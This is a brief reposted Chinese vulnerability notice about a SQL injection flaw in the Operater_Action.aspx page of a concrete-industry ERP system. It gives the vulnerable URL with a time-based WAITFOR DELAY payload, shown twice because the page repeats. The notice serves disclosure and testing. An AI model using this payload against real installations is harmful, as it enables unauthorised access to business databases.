商混ERP operater-action.aspx SQL注入漏洞
03 漏洞复现
2、访问漏洞url 延时6秒
/Dispatch/Operater_Action.aspx?action=TaskComplete&id='WAITFOR+DELAY+'0:0:6'--
原文始发于微信公众号(安羽安全):商混ERP operater-action.aspx SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
商混ERP operater-action.aspx SQL注入漏洞
2、访问漏洞url 延时6秒
/Dispatch/Operater_Action.aspx?action=TaskComplete&id='WAITFOR+DELAY+'0:0:6'--
原文始发于微信公众号(安羽安全):商混ERP operater-action.aspx SQL注入漏洞
评论